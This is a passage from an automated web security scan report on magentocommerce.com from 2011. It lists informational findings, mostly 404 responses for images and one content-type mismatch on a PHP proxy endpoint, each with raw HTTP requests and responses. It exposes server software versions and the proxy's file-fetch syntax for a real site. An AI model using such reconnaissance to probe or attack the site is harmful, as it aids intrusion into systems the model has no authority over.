GET /img/btn_submit.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.magentocommerce.com

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:23 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 571

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.53</center>
</body>
</html>
<!-- a padding to disable MSIE
...[SNIP]...
12.3. http://www.magentocommerce.com/img/icon_post_comment.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /img/icon_post_comment.gif

Request

GET /img/icon_post_comment.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.magentocommerce.com

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:38 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 571

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.53</center>
</body>
</html>
<!-- a padding to disable MSIE
...[SNIP]...
12.4. http://www.magentocommerce.com/img/magento_dnld_rr.gif  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /img/magento_dnld_rr.gif

Request

GET /img/magento_dnld_rr.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.magentocommerce.com

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:23 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 571

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.53</center>
</body>
</html>
<!-- a padding to disable MSIE
...[SNIP]...
13. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.magentocommerce.com
Path:   /proxy/proxy.php/x.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /proxy/proxy.php/x.js HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Content-Length: 52

SYNTAX: proxy.php/x.js?f=dir1/file1.js,dir2/file2.js
Report generated by XSS.CX at Fri Aug 12 09:20:15 GMT-06:00 2011.